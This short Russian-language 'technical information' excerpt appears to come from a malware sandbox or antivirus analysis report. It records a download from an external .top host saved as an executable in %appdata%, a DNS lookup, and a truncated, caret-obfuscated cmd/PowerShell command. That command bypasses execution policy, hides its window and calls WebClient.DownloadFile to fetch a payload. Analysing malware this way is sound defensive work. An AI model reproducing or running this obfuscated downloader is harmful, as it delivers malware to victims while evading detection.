Техническая информация
- http://vvorootad.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^WERs^h^E^LL^.E^Xe -E^XE^c^U^tio^nP^Ol^i^cY^ BypasS -^n^OP^ROf^I^l^e -^w^IN^D^OWstYL^E ^Hi^D^d^EN^ (N^Ew^-Ob^jEc^t^ s^YStE^M^.^nET.^WEB^C^LI^e^NT^)^.^D^OWNlo^Adfile('http://vv...
- DNS ASK vv###otad.top
- '<SYSTEM32>\cmd.exe' /c "Po^WERs^h^E^LL^.E^Xe -E^XE^c^U^tio^nP^Ol^i^cY^ BypasS -^n^OP^ROf^I^l^e -^w^IN^D^OWstYL^E ^Hi^D^d^EN^ (N^Ew^-Ob^jEc^t^ s^YStE^M^.^nET.^WEB^C^LI^e^NT^)^.^D^OWNlo^Adfile('http://vv...' (со скрытым окном)